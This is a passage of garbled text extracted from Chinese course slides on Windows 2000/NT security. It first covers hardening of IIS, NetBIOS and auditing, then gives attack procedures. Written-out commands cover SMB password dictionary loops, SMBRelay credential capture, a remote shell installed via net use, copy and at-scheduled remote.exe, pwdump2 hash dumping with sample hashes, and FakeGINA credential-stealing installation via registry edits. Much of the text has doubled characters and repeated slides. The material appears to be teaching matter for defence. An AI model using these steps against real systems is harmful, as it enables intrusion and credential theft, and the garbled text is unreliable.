58、服务或者更改默认的社区名称和权限或者更改默认的社区名称和权限禁用禁用terminalserver服务服务将不必要的服务设置为手动将不必要的服务设置为手动AlerterClipBookComputerBrowserCIWwindows系统安全(07)禁用或删除所有的示例应用程序禁用或删除所有的示例应用程序示例只是示例;在默认情况下,并不安装它们,且从不在生产服务器上安装。请注意一些示例安装,它们只可从http:/localhost或127.0.0.1访问;但是,它们仍应被删除。下面列出一些示例的默认位置。示例示例虚拟目录虚拟目录位置位置IIS示例IISSamplesc:inetpubiissam
59、plesIIS文档IISHelpc:winnthelpiishelp数据访问MSADCc:programfilescommonfilessystemmsadc3.7.1IIS服务安全配置CIWwindows系统安全(07)删除无用的脚本映射删除无用的脚本映射IIS被预先配置为支持常用的文件名扩展如.asp和.shtm文件。IIS接收到这些类型的文件请求时,该调用由DLL处理。如果您不使用其中的某些扩展或功能,则应删除该映射,步骤如下:C打开Internet服务管理器。C右键单击Web服务器,然后从上下文菜单中选择“属性”。C主属性C选择WWW服务|编辑|主目录|配置3.7.1IIS服务安全配置
60、CIWwindows系统安全(07)禁用父路径禁用父路径“父路径”选项允许在对诸如MapPath函数调用中使用“.”。在默认情况下,该选项处于启用状态,应该禁用它。禁用该选项的步骤如下:右键单击该Web站点的根,然后从上下文菜单中选择“属性”。单击“主目录”选项卡。单击“配置”。单击“应用程序选项”选项卡。取消选择“启用父路径”复选框。禁用禁用-内容位置中的内容位置中的IP地址地址“内容-位置”标头可暴露通常在网络地址转换(NAT)防火墙或代理服务器后面隐藏或屏蔽的内部IP地址。3.7.1IIS服务安全配置CIWwindows系统安全(07)设置适当的设置适当的IIS日志文件日志文件ACL请确
61、保IIS产生的日志文件(%systemroot%system32LogFiles)上的ACL是Administrators(完全控制)System(完全控制)Everyone(RWC)这有助于防止恶意用户为隐藏他们的踪迹而删除文件。设置适当的设置适当的虚拟目录的权限虚拟目录的权限请确保IIS的虚拟目录如scripts等权限设置是否最小化,删除不需要的目录。将将iis目录重新定向目录重新定向不要使用系统默认的路径,自定义WEB主目录路径并作相应的权限设置。使用专门的安全工具使用专门的安全工具微软的IIS安全设置工具:IISLockTool;是针对IIS的漏洞设计的,可以有效设置IIS安全属性。3
62、.7.1IIS服务安全配置CIWwindows系统安全(07)WIN2K 取消绑定文件和共享绑定C打开控制面板网络高级高级设置C选择网卡并且将Microsoft网络的文件和打印共享的复选框取消C可以完全禁止tcp139和445WinNT C在WindowsNT下取消NetBIOS与TCP/IP协议的绑定。可以按如下步骤进行:C点击“控制面板-网络-NetBIOS接口-WINS客户(TCP/IP)-禁用”,再点“确定”,然后重启。C这样NT的计算机名和工作组名也隐藏了。3.7.2Netbios的安全设置CIWwindows系统安全(07)禁止匿名连接列举帐户名需要对注册表做以下修改。(警告:不正
63、确地修改注册表会导致严重的系统错误,请慎重行事!)1运行注册表编辑器(Regedt32.exe)。2定位在注册表中的下列键上:HKEY_LOCAL_MACHINESystemtCurrentControlLSA3在编辑菜单栏中选取加一个键值:ValueName:RestrictAnonymousDataType:REG_DWORDValue:1(Windows2000下为2)4退出注册表编辑器并重启计算机,使改动生效。3.7.2Netbios的安全设置CIWwindows系统安全(07)win2000的本地安全策略(如果是域服务器就是在域服务器安全和域安全策略中)就有这样的选项Restrict
64、Anonymous(匿名连接的额外限制),这个选项有三个值:C0:None.Relyondefaultpermissions(无,取决于默认的权限)C1:DonotallowenumerationofSAMaccountsandshares(不允许枚举SAM帐号和共享)C2:Noaccesswithoutexplicitanonymouspermissions(没有显式匿名权限就不允许访问)0这个值是系统默认的,什么限制都没有,远程用户可以知道你机器上所有的账号、组信息、共享目录、网络传输列表(NetServerTransportEnum等等,对服务器来说这样的设置非常危险。1这个值是只允许非
65、NULL用户存取SAM账号信息和共享信息。2这个值是在win2000中才支持的。3.7.2Netbios的安全设置CIWwindows系统安全(07)DHCP授权机制授权机制DNS区域传输的验证区域传输的验证AD集成区域集成区域DDNS的更新验证的更新验证FTP服务与服务与NTFS的结合的结合3.7.3其他网络服务CIWwindows系统安全(07)3.8 安全日志Windows的默认安装是不开安全审核。Windows2000下本地安全策略-审核策略中打开相应的审核推荐的审核是:账户管理成功失败登录事件成功失败对象访问失败策略更改成功失败特权使用失败系统事件成功失败目录服务访问失败账户登录事件
66、成功失败CIWwindows系统安全(07)3.8 安全日志WindowsNT下程序管理工具域用户管理器规则审核谨慎打开“进程追踪”,否则大量的日志信息反而可能使审核困难文件及对象访问”必须同时在“文件属性”的“审核”设置审核的事件CIWwindows系统安全(07)3.8 安全日志CIWwindows系统安全(07)SiteSiteDomainOUWindows2000连续执行连续执行UsersUsersComputersComputers管理者只设置组策略一次管理者只设置组策略一次GroupPolicyGroupPolicy3.9组策略是安全的,仅仅管理员能更改设置确保用户有适合他们工作的
67、环境与站点、域、组织单元相关联,作用于其中的用户和计算机CIWwindows系统安全(07)3.9.1组策略设置类型组策略设置的类型组策略设置的类型管理模板管理模板基于注册表的组策略设置基于注册表的组策略设置安全设置安全设置设置本地,域及网络安全设置本地,域及网络安全软件安装软件安装设置集中化管理和软件安装设置集中化管理和软件安装脚本脚本设置开机、关机或者用户登陆、退出时运行的脚设置开机、关机或者用户登陆、退出时运行的脚本本远程安装服务远程安装服务当运行远程安装服务当运行远程安装服务(RIS)(RIS)的远程安装向导时,控的远程安装向导时,控制用户可能的选项设置制用户可能的选项设置Intern
68、et浏览维护浏览维护管理和定制基于管理和定制基于Windows2000Windows2000的的IEIE的设置的设置文件夹重定向文件夹重定向网络服务器上用户文件夹的设置网络服务器上用户文件夹的设置CIWwindows系统安全(07)3.9.2安全策略帐户策略本地策略事件日志受限组系统服务注册表文件系统CIWwindows系统安全(07)FPORT C系统自带netstat查看机器开放的端口,也可以任务管理器来查看当前机器的进程,但是这两个东西都有自身的缺点,由于netstat由于设计的原因很多开放的端口无法查出,而使用任务管理器的时候只能查看到进程的名字,如果一个恶意的攻击者把木马命名为svc
69、host.exe,dllhost.exe,这样就能很好麻痹一些管理员,由于这些文件可能在一台web服务器上存在多个进程,然后给这个木马定义一个很象RPC的端口,不仔细查真的很难查找得到,FPORT就弥补了netstat和taskbar的不足C该软件可以得到所有端口对应的文件有完整的路径名,可以避免有些木马程序使用系统服务的文件名,而将其放在非系统目录,无法在TaskManager里察觉,这个时候FPort的优势就体现出来了C下载地址:http:/3.10安全工具CIWwindows系统安全(07)fport运行示例:PidProcessPortProtoPath400svchost-135TC
70、PC:WINNTsystem32svchost.exe8System-139TCP8System-445TCP8System-1028TCP872rsvp-1047TCPC:WINNTSystem32rsvp.exe624WinMgmt-1048TCPC:WINNTSystem32WBEMWinMgmt.exe624WinMgmt-1049TCPC:WINNTSystem32WBEMWinMgmt.exe540inetinfo-1054TCPC:WINNTSystem32inetsrvinetinfo.exe1616msdtc-2692TCPC:WINNTSystem32msdtc.exe16
71、16msdtc-3372TCPC:WINNTSystem32msdtc.exe8System-3778TCP400svchost-135UDPC:WINNTsystem32svchost.exe8System-137UDP8System-138UDP8System-445UDP256lsass-500UDPC:WINNTsystem32lsass.exe244services-1029UDPC:WINNTsystem32services.exe540inetinfo-3456UDPC:WINNTSystem32inetsrvinetinfo.exe3.10安全工具CIWwindows系统安全(
72、07)IISLockdown微软设计发布的帮助管理员们设置IIS安全性的工具。IISLockTool具有以下功能和特点:帮助管理员设置IIS安全性;此工具可以在IIS4和IIS5上使用;帮助管理员去掉对本网站不必要的一些服务,使IIS在满足本网站需求的情况下运行最少的服务下载地址Release.asp?ReleaseID=339613.10安全工具CIWwindows系统安全(07)3.10安全工具CIWwindows系统安全(07)长期的系统维护提高安全意识 时刻注意安全漏洞和补丁发布 定期分析日志系统,发现潜在攻击 注意账号和口令的安全问题 注意观察系统异常 管理员,才是关键!CIWwin
73、dows系统安全(07)注意!仅仅只是主机安全(Host Security) 应用服务安全的一部分 绝不是网络安全 (network security) 主机安全是网络安全的基础之一 CIWwindows系统安全(07)操作系统安全Windows 系统安全(二)CIWwindows系统安全(07)针对针对Win2K的攻击的攻击SMBSMB攻击攻击 权限提升权限提升 获得交互获得交互 扩大影响扩大影响 清除痕迹清除痕迹CIWwindows系统安全(07)攻击手段攻击手段猜测用户名和密码猜测用户名和密码 获取密码散列获取密码散列 利用脆弱的网络服务或客户端利用脆弱的网络服务或客户端 获取对系统的物
74、理访问获取对系统的物理访问CIWwindows系统安全(07)SMBSMB攻击攻击猜测猜测SMBSMB密码密码 窃听窃听SMBSMB认证认证CIWwindows系统安全(07)攻击前准备工作攻击前准备工作关闭与目标之间的空连接关闭与目标之间的空连接 回顾回顾扫描结果扫描结果 避免账户锁定避免账户锁定 管理员的重要性管理员的重要性CIWwindows系统安全(07)关闭与目标之间的空连接关闭与目标之间的空连接因因为为NT/2000NT/2000不不支支持持同同时时使使用用不不同同的的凭凭据据进进行行连连接接,我我们们必必须须使使用用netnetuseuse/delete/delete命命令令注注
75、销销现现有有的的与与目目标标之之间间的的全全部部空会话空会话( (使用使用/y/y参数可以使连接关闭而不用进行提示参数可以使连接关闭而不用进行提示) ): C:net use * /d /y CIWwindows系统安全(07)回顾扫描结果回顾扫描结果实验室或测试账户实验室或测试账户 在你的环境中存在多少这样的账户?其中有多少个位于本地的Administrators组中?你是否知道这样的账户的密码通常是什么在注释字段中带有丰富信息的用户账户在注释字段中带有丰富信息的用户账户 通过查点获取的信息,见到过在这个字段中以明文的形式写出的密码。那些不愿意记住复杂密码的“不幸的”用户经常在注释字段中有很
76、多提示,其有助于密码猜测AdministratorsAdministrators组或组或DomainDomainAdminsAdmins组的成员组的成员 这些账户通常是攻击者的目标,因为它们拥有本地系统或域的至高无上的权限。同时,使用Microsoft的默认工具不能锁定本地的Administrator账户,这使得它成为连续密码猜测攻击的目标CIWwindows系统安全(07)回顾扫描结果回顾扫描结果共享的组账户共享的组账户 大多数组织都倾向于在给定环境中的大部分系统上重用账户凭据。例如类似于backup(备份)或admin(管理)这样的账户名称。这些账户的密码通常都比较容易猜测最近一定时期内没
77、有修改过密码的账户最近一定时期内没有修改过密码的账户 这通常表明用户和系统管理员对账户维护工作的不重视,有可能导致潜在的危险。这些账户也可能会使用在创建该账户时指定的默认密码,这是很容易猜出的(通常会使用单位的名称,或者是Welcome(欢迎)等单词)最近一定时期内没有登录过的账户最近一定时期内没有登录过的账户 同样,使用频率很低的账户也是维护工作的疏忽所导致的,它们的密码通常也比较容易猜出 CIWwindows系统安全(07)避免账户锁定探测锁定避免账户锁定探测锁定阈值值EnumEnumppGuestGuest帐户猜测帐户猜测 在Windows2000上,Guest账户在默认情况下是被禁用的
78、,但是如果你达到了锁定阈值,你仍然能够收到提示CIWwindows系统安全(07)Guest猜测猜测C:net use ipc$ * /u:guest Type the password for mgmgrandipc$: System error 1326 has occurred. Logon failure: unknown user name or bad password. C:net use ipc$ * /u:guest Type the password for mgmgrandipc$: System error 1909 has occurred. The referenc
79、ed account is currently locked out and may not be logged on to.CIWwindows系统安全(07)Guest猜测猜测在在猜猜测测Guest(Guest(或或其其他他账账户户) )的的密密码码时时,需需要要注注意意的的另另外外一一件件事事是是如如果果你你确确实实猜猜对对了了一一个个已已经经被被禁禁用用账账户户的的密密码码,那那么么将将会会出出现现另另一一种不同的错误消息:种不同的错误消息: C:net use ipc$ * /u:guest Type the password for mgmgrandipc$: System err
80、or 1331 has occurred. Logon failure: account currently disabled. 在在WindowsWindows20002000中中,GuestGuest账账户户的的密密码码默默认认为为空空。于于是是,如如果果你你连连续续地地以以空空密密码码来来猜猜测测GuestGuest账账户户,那那么么永永远远也也不不会会达达到到锁锁定定阈阈值值( (除非密码被人为修改过除非密码被人为修改过) )CIWwindows系统安全(07)开始攻击开始攻击猜测猜测SMBSMB密码密码CIWwindows系统安全(07)手工手工SMB密码猜测密码猜测C:net us
81、e ipc$ password /u:username System error 1326 has occurred. Logon failure: unknown user name or bad password.CIWwindows系统安全(07)可能的用户名密码组合可能的用户名密码组合(做字典,直接使用做字典,直接使用Xsacn测试)测试)CIWwindows系统安全(07)使用使用For循环字典攻击循环字典攻击创建字典创建字典 C:echo credentials.txtcredentials.txt administrator administrator password admi
82、nistrator administratorCIWwindows系统安全(07)使用使用For循环字典攻击循环字典攻击猜测猜测 C:FOR /F tokens=1,2* %i in (credentials.txt) More? do net use IPC$ %j /u:%i More? 2nul More? & echo %time% %date% out More? & echo acct: %i pass: %j outCIWwindows系统安全(07)使用使用For循环字典攻击循环字典攻击查看猜测结果查看猜测结果 C:type out 11:53:43.42 Wed 05/09
83、/2001 acct: administrator pass: CIWwindows系统安全(07)自动攻击工具自动攻击工具NATNATSMBGrindSMBGrind FgrindFgrind CIWwindows系统安全(07)对策对策实施密码复杂性要求实施密码复杂性要求 账户锁定账户锁定 启用登录失败事件的审核启用登录失败事件的审核 查看事件日志查看事件日志 锁定真正的锁定真正的AdministratorAdministrator账户并创建一个假目标账户并创建一个假目标 禁用闲置账户禁用闲置账户 仔细核查管理人员仔细核查管理人员 CIWwindows系统安全(07)开始攻击开始攻击窃听
84、窃听SMBSMB认证认证CIWwindows系统安全(07)窃听方法窃听方法直接从网络电缆上嗅探直接从网络电缆上嗅探SMBSMB凭据凭据 使用欺骗性服务器捕获使用欺骗性服务器捕获SMBSMB凭据凭据 中间人中间人(Man-in-the-middle(Man-in-the-middle,MITM)MITM)攻击攻击CIWwindows系统安全(07)LANManager的口令散列的口令散列微微软软在在WindowsWindowsNTNT和和 20002000系系统统里里缺缺省省安安装装了了LANManagerLANManager口令散列口令散列 由由于于LANLANManagerManager使
85、使用用的的加加密密机机制制比比微微软软现现在在的的方方法法脆脆弱弱,LANLANManagerManager的的口口令令能能在在很很短短的的时时间间内内被被破破解解。即即使使是是强强健健的的口口令令散散列列也也能能在在一一个月内破解掉个月内破解掉CIWwindows系统安全(07)LANManager的口令散列机制的口令散列机制长的口令被截成长的口令被截成1414个字符个字符 短的口令被填补空格变成短的口令被填补空格变成1414个字符个字符 口令中所有的字符被转换成大写口令中所有的字符被转换成大写 口令被分割成两个口令被分割成两个7 7个字符的片断个字符的片断CIWwindows系统安全(07
86、)LANManager的口令散列机制的口令散列机制 LMLM算算法法是是从从账账户户密密码码的的两两个个独独立立的的7 7个个字字符符分分段段创创建建用户的散列的用户的散列的 前前8 8个个字字节节来来自自于于用用户户密密码码的的前前7 7个个字字符符,随随后后的的8 8个个字字节来自于密码的第节来自于密码的第814814个字符个字符CIWwindows系统安全(07)LANManager的口令散列机制的口令散列机制每每块块都都可可以以通通过过对对所所有有可可能能的的8 8字字节节组组合合进进行行穷穷举举攻攻击击而猜出而猜出 攻攻击击全全部部的的8 8字字节节“字字符符空空间间”对对于于现现代
87、代的的桌桌面面计计算算机处理器来说是很轻松的事情机处理器来说是很轻松的事情 如如果果攻攻击击者者能能够够发发现现用用户户的的LMLM散散列列,那那么么他他们们最最终终破破解得到实际的明文密码就很可能了解得到实际的明文密码就很可能了CIWwindows系统安全(07)LC4phtcrackCIWwindows系统安全(07)L0phtcrack的局限性的局限性只能从共享介质中捕获质询只能从共享介质中捕获质询- -应答通信应答通信 目目前前还还不不能能从从两两个个WindowsWindows20002000系系统统间间的的登登录录交交换换中中获取散列获取散列 通通过过网网络络监监听听破破解解质质询
88、询- -应应答答散散列列所所需需的的时时间间随随着着添添加加的密码散列数量而线性增长的密码散列数量而线性增长 在在使使用用SMBCaptureSMBCapture之之前前,WinPcapWinPcap v2.1v2.1报报文文捕捕获获驱驱动动程序必须成功安装和运行程序必须成功安装和运行 目前还不能从目前还不能从NTLMv2NTLMv2质询质询- -应答通信中得到散列应答通信中得到散列CIWwindows系统安全(07)欺骗欺骗将将SMBSMB登录重定向到攻击者登录重定向到攻击者假假设设攻攻击击者者能能够够欺欺骗骗用用户户连连接接到到他他所所指指定定的的SMBSMB服服务务器器上去,捕获上去,捕
89、获LMLM应答就变得容易多应答就变得容易多 L0phtcrackL0phtcrack的的早早期期版版本本中中曾曾经经建建议议了了一一种种最最基基本本的的欺欺骗骗方方法法:向向目目标标用用户户发发送送一一封封电电子子邮邮件件,其其中中嵌嵌入入假假冒冒的的SMBSMB服服务务器器的的超超级级链链接接。用用户户收收到到这这封封邮邮件件,单单击击超超级级链链接接( (手手动动的的或或自自动动的的) ),客客户户端端会会在在不不受受注注意意的的情情况况下下将将该该用用户户的的SMBSMB凭凭据据通过网络发送通过网络发送 这这样样的的超超级级链链接接很很容容易易伪伪装装,而而且且通通常常只只需需要要与与用
90、用户户进进行行很很少少的的交交互互,因因为为如如果果没没有有明明确确提提供供其其他他认认证证信信息息的的话话,Windows,Windows会自动尝试以当前用户的身份登录会自动尝试以当前用户的身份登录CIWwindows系统安全(07)对策对策 确确保保遵遵守守网网络络安安全全的的最最佳佳操操作作准准则则。在在受受到到保保护护的的网网络络中中使使用用SMBSMB服服务务,确确保保全全部部的的网网络络基基础础设设施施不不允允许许SMBSMB通信到达不受信任的结点上通信到达不受信任的结点上 配配置置网网络络中中所所有有的的WindowsWindows系系统统,禁禁止止LMLM散散列列在在网网络络中
91、中的传播的传播CIWwindows系统安全(07)禁止发送禁止发送LM散列散列CIWwindows系统安全(07)使用使用SMBRelaySMBRelay捕获捕获SMBSMB认证认证SMBRelaySMBRelay实实际际上上是是一一个个SMBSMB服服务务器器,它它能能够够从从到到来来的的SMBSMB通信中收集用户名和密码散列通信中收集用户名和密码散列 顾顾名名思思义义,SMBRelaySMBRelay不不仅仅能能够够实实现现虚虚假假的的SMBSMB终终端端的的功功能能在在特特定定的的情情况况下下,它它还还能能够够进进行行中中间间人人(man-in-(man-in-the-middlethe
92、-middle,MITM)MITM)攻击攻击CIWwindows系统安全(07)建立假的建立假的SMBSMB服务器服务器 C:smbrelay /E SMBRelay v0.992 ?TCP (NetBT) level SMB man-in-the-middle relay attack Copyright 2001: Sir Dystic, Cult of the Dead Cow Send complaints, ideas and donations to 2 ETHERNET CSMACD ?3Com 10/100 Mini PCI Ethernet Adapter 1 SOFTWAR
93、E LOOPBACK ?MS TCP Loopback interfaceCIWwindows系统安全(07)启动假的启动假的SMBSMB服务器服务器 C:smbrelay /IL 2 /IR 2 ;在序号为;在序号为2的网络接口上建立的网络接口上建立 SMBRelay v0.992 ?TCP (NetBT) level SMB man-in-the-middle relay attack Copyright 2001: Sir Dystic, Cult of the Dead Cow Send complaints, ideas and donations to Using relay ad
94、apter index 2: 3Com EtherLink PCICIWwindows系统安全(07)等待并捕获等待并捕获SMBSMB连接连接 Connection from 192.168.234.44:1526 Request type: Session Message 137 bytes Username: administrator Domain: CAESARS-TS OS: Windows 2000 2195 Lanman type: Windows 2000 5.0 Password hash written to diskCIWwindows系统安全(07)CIWwindows
95、系统安全(07)CIWwindows系统安全(07)权限提升权限提升NetDDENetDDECIWwindows系统安全(07)权限提升权限提升权权限限提提升升通通常常是是指指提提升升当当前前用用户户账账户户的的能能力力,达达到到具具有有更更 高高 权权 限限 的的 账账 户户 , 通通 常常 是是 超超 级级 用用 户户 , 例例 如如AdministratorAdministrator或或SYSTEMSYSTEM的过程的过程 从从恶恶意意黑黑客客的的角角度度来来说说,获获取取一一个个普普通通账账户户,然然后后进进行行权权限限提提升升攻攻击击,比比远远程程进进行行攻攻击击直直接接获获取取超超
96、级级用用户户权权限限要容易得多要容易得多 不不管管在在哪哪种种情情况况下下,无无论论他他达达到到了了什什么么特特权权级级别别,通通过过认认证证的的攻攻击击者者都都比比未未通通过过认认证证时时要要有有很很多多达达到到目目的的的的选选择择CIWwindows系统安全(07)作为作为SYSTEMSYSTEM身份运行的身份运行的NetDDENetDDE20012001年年2 2月月,stakestake的的DildogDildog发发现现了了WindowsWindows20002000的的网网络络动动态态数数据据交交换换服服务务(Network(Network DynamicDynamic DataD
97、ataExchangeExchangeServiceService,NetDDENetDDE) )中中的的一一个个漏漏洞洞,这这个个漏漏洞允许本地用户以洞允许本地用户以SYSTEMSYSTEM特权运行任意的命令特权运行任意的命令 NetDDENetDDE是是使使应应用用程程序序通通过过“受受信信任任的的共共享享”来来共共享享数数据据的的一一种种技技术术。通通过过受受信信任任的的共共享享,可可以以发发出出请请求求执执行应用程序,并运行在行应用程序,并运行在SYSTEMSYSTEM账户的上下文中账户的上下文中CIWwindows系统安全(07)CIWwindows系统安全(07)获得交互获得交互命
98、令行控制命令行控制 GUIGUI控制控制CIWwindows系统安全(07)交互方式交互方式一一旦旦攻攻击击者者获获取取了了对对WindowsWindows20002000系系统统的的管管理理访访问问,几几乎乎没没有有什什么么方方法法能能够够阻阻止止他他 将将带带来来的的损损害害。很很少少有有攻攻击击者者会会满满足足于于他他所所获获得得的的“管管理理”成成就就并并满满意意地地离离开开。相相反反,他他总总会会进进一一步步企企图图获获取取交交互互式的控制式的控制 交交互互控控制制是是查查看看系系统统的的内内部部工工作作状状态态并并任任意意执执行行命命令令的的能能力力,就就像像物物理理上上坐坐在在系
99、系统统前前面面一一样样。在在WindowsWindows世世界界中中,这这可可以以通通过过两两种种方方式式之之一一来来实实现现:通通过过命命令令行行界界面面,例例如如类类似似于于telnettelnet的的连连接接,或或者者通通过过图图形形化化的的界界面面,例例如如PCAnywherePCAnywhere、MicrosoftMicrosoft终终端端服服务务器器或或其其他类似的远程控制产品他类似的远程控制产品 当当然然,攻攻击击者者不不会会希希望望使使用用这这种种重重量量级级的的技技术术,他他们们需需要要的的是是小小的的、易于隐藏的控制方法易于隐藏的控制方法CIWwindows系统安全(07)
100、命令行控制命令行控制Opentelnet.exeOpentelnet.exeRemote.exeRemote.exe NetuseNetuseCIWwindows系统安全(07)Remote.exe(Remote.exe(直接使用直接使用opentelnet.exe)opentelnet.exe)remote.exeremote.exe来来自自于于WindowsWindowsNT/2000NT/2000ResourceResourceKitKitremote.exeremote.exe可可以以运运行行于于服服务务器器模模式式或或客客户户端端模模式式 要要使使用用remote.exeremote
101、.exe获获取取目目标标WindowsWindows系系统统的的命命令行控制,你必须进行如下步骤的操作:令行控制,你必须进行如下步骤的操作:CIWwindows系统安全(07)Remote.exeRemote.exe1. 与目标之间创建管理连接:与目标之间创建管理连接: C:net use 10.1.1.5ipc$ password /u:administrator 2. 将一个驱动器映射到管理共享将一个驱动器映射到管理共享C$C$: C:net use * 10.1.1.5c$ Drive D: is now connected to 10.1.1.5c$. The command comp
102、leted successfully.CIWwindows系统安全(07)Remote.exeRemote.exe3.3. 将将remote.exeremote.exe复制到目标上的一个目录中:复制到目标上的一个目录中: C:copy remote.exe d:winntsystem32 4.4. 调用调用scsc命令启动计划任务服务:命令启动计划任务服务: C:sc 10.1.1.5 start schedule 5.5. 确定远程系统上的时间:确定远程系统上的时间: C:net time 6.6. 使用使用atat命令启动命令启动remote.exeremote.exe程序,运行为服务器模
103、式程序,运行为服务器模式:C:at 10.1.1.5 2:12A 摂摂remote /s cmd hackwin “” CIWwindows系统安全(07)Remote.exeRemote.exe7.7. 检查是否已经通过检查是否已经通过atat命令启动了命令启动了remote.exeremote.exe程序:程序: C:at 10.1.1.5 Status IDDayTimeCommand Line -21Today2:12 AMremote /s cmd hackwin 8.8. 以客户端模式运行以客户端模式运行remote.exeremote.exe程序,连接到目标系统:程序,连接到目标
104、系统: C:remote /c 10.1.1.5 hackwinCIWwindows系统安全(07)扩大影响扩大影响确定审核确定审核 密码提取密码提取 密码破解密码破解 文件搜索文件搜索 GINAGINA木马木马 嗅探嗅探 跳板跳板 端口重定向端口重定向CIWwindows系统安全(07)确定审核确定审核Windows审核可以在事件日志或syslog中记录下特定的事件,以审查历史。日志甚至可以用来触发向系统管理员发出寻呼警告或电子邮件因此,确定审核状态通常是帮助理解黑客在系统上所能够停留时间的不错的方法auditpolCIWwindows系统安全(07)auditpolauditpolC:au
105、ditpol 10.1.1.5 Running (X) Audit Enabled System= Success and Failure Logon= Failure Object Access= Success and Failure Privilege Use= Success and FailureCIWwindows系统安全(07)密码提取密码提取系统中的密码存储有很多种不同的方式系统中的密码存储有很多种不同的方式 我我们们将将讨讨论论保保存存密密码码的的各各种种不不同同的的位位置置,以以及用来获取这些密码的方法及用来获取这些密码的方法CIWwindows系统安全(07)转存转存SA
106、MSAM和活动目录密码和活动目录密码从注册表中转存密码是一项简单的工作从注册表中转存密码是一项简单的工作 系系统统的的默默认认syskeysyskey是是安安全全账账户户管管理理器器(Security(SecurityAccountsAccountsManagerManager,SAM)SAM)或或活活动动目目录录(AD)(AD)数数据据库库。这这意意味味着着系系统统中中的的用用户户名名和和密密码码是是使使用用128128位位加加密密的的,使使得得破破解解密密码码几几乎乎是不可能的。是不可能的。 但但是是不不要要担担心心,通通过过使使用用由由ToddToddSabinSabin编编写写的的经经
107、过过修修改改的的pwdump2pwdump2工具,仍然有方法可以获取加密的密码散列工具,仍然有方法可以获取加密的密码散列 Pwdump2Pwdump2使使 用用 了了 一一 种种 称称 为为 动动 态态 加加 载载 库库 (Dynamically(DynamicallyLoadableLoadableLibraryLibrary,DLL)DLL)注注入入的的技技术术。这这种种技技术术可可以以通通过过一一个个进进程程强强制制其其他他的的进进程程装装载载附附加加的的DLLDLL,然然后后在在其其他他进进程的地址空间和用户上下文中运行这个程的地址空间和用户上下文中运行这个DLLDLL中的代码中的代码
108、CIWwindows系统安全(07)Pwdump2Pwdump2C:copy pwdump2.exe 10.1.1.5c$ C:copy samdump.dll 10.1.1.5c$ 远程C:pwdump2 Administrator:500:e6efe4be4568c7fdaad3b435b51404ee: fd64812d22b9b94638c2a7ff8c49ddc6: george:1006:315b02fdd7121d6faad3b435b51404ee: d1cd4a77400159a23c47ce7e8808513d: Guest:501:aad3b435b51404eeaad3
109、b435b51404ee:CIWwindows系统安全(07)转存转存SAMSAM和活动目录密码和活动目录密码从注册表中转存密码是一项简单的工作从注册表中转存密码是一项简单的工作 系系统统的的默默认认syskeysyskey是是安安全全账账户户管管理理器器(Security(SecurityAccountsAccountsManagerManager,SAM)SAM)或或活活动动目目录录(AD)(AD)数数据据库库。这这意意味味着着系系统统中中的的用用户户名名和和密密码码是是使使用用128128位位加加密密的的,使使得得破破解解密密码码几几乎乎是不可能的。是不可能的。 但但是是不不要要担担心心
110、,通通过过使使用用由由ToddToddSabinSabin编编写写的的经经过过修修改改的的pwdump2pwdump2工具,仍然有方法可以获取加密的密码散列工具,仍然有方法可以获取加密的密码散列 Pwdump2Pwdump2使使 用用 了了 一一 种种 称称 为为 动动 态态 加加 载载 库库 (Dynamically(DynamicallyLoadableLoadableLibraryLibrary,DLL)DLL)注注入入的的技技术术。这这种种技技术术可可以以通通过过一一个个进进程程强强制制其其他他的的进进程程装装载载附附加加的的DLLDLL,然然后后在在其其他他进进程的地址空间和用户上下
111、文中运行这个程的地址空间和用户上下文中运行这个DLLDLL中的代码中的代码CIWwindows系统安全(07)密码破解密码破解一一旦旦从从远远程程系系统统获获取取了了加加密密的的密密码码或或散散列列,攻攻击击者者通通常常会会把把它它们们保保存存在在文文件件中中,并并对对它它们们运运行行密密码码破破解解程程序以发现真正的密码序以发现真正的密码 很很多多人人错错误误地地认认为为密密码码破破解解是是解解密密密密码码。事事实实并并非非如如此此目目前前还还没没有有方方法法能能够够对对使使用用NT/2000NT/2000算算法法加加密密的的密码散列进行解密。密码散列进行解密。 密密码码破破解解的的过过程程
112、实实际际上上是是使使用用相相同同的的算算法法对对已已知知的的值值进进行行散散列列运运算算,然然后后将将结结果果与与使使用用pwdumpXpwdumpX等等工工具具获获取取的的散散列列进进行行比比较较。如如果果散散列列匹匹配配,那那么么攻攻击击者者就就知知道道了了密密码码的的明明文文值值。因因此此,密密码码破破解解可可以以被被认认为为是是一一种高级的、离线的密码猜测方法。种高级的、离线的密码猜测方法。CIWwindows系统安全(07)密码破解工具密码破解工具JohntheRipperJohntheRipperL0phtcrack3L0phtcrack3CIWwindows系统安全(07)文件搜
113、索文件搜索findfindFindstrFindstr GrepGrep InvisiableInvisiable KeyloggerKeylogger Stealyh(IKSStealyh(IKS) 击击键记录工具键记录工具 CIWwindows系统安全(07)GINAGINA木马木马GINA(GraphicalGINA(Graphical IdentificationIdentificationandandAuthorizationAuthorization, 图图 形形 化化 鉴鉴 定定 和和 授授 权权 ) )是是 用用 户户 和和WindowsWindows认证系统之间的中间人认证系
114、统之间的中间人 当当 你你 启启 动动 你你 的的 计计 算算 机机 时时 , 屏屏 幕幕 上上 要要 求求 你你 按按 下下CTRL+ALT+DELCTRL+ALT+DEL进行登录的时候,这正是进行登录的时候,这正是GINAGINA在工作在工作 当当然然,由由于于GINAGINA本本身身的的保保密密性性质质,很很多多黑黑客客很很关关注注它它的的破破解解。特特定定的的程程序序可可以以将将自自己己介介入入到到用用户户和和操操作作系系统之间,从而窃取用户的密码统之间,从而窃取用户的密码CIWwindows系统安全(07)GINAGINA木马木马FakeGINAFakeGINA来自Ntsecurit
115、y.nu的ArneVidstrom开发的FakeGINA是IKS等击键记录程序的替代品。这个程序可以介入到 Winlogon和 GINA之 间 的 通 信 当 中 去 , 捕 获 在CTRL+ALT+DEL之后输入的用户名和密码然后FakeGINA会将捕获的用户名和密码写入到一个文本文件中去。这个程序是通过替换注册表中现有的msgina.dll来达到这个目的的CIWwindows系统安全(07)FakeGINAFakeGINA的安装的安装为了远程安装这个程序,攻击者需要按照下面的步骤进行操作:为了远程安装这个程序,攻击者需要按照下面的步骤进行操作: 1.1. 将将fakegina.dllfak
116、egina.dll复复制制到到远远程程驱驱动动器器的的%SystemRoot%system32%SystemRoot%system32目目录录中中去。去。 C:copy fakegina.dll 10.1.1.3admin$system32 2.2. 使用使用ResourceKitResourceKit工具工具reg.exereg.exe,向,向WindowsWindows注册表中加入如下键值:注册表中加入如下键值: C:reg add “SOFTWAREMicrosoftWindows NTCurrentVersion Winlogon GinaDLL=fakegina.dll?REG_SZ
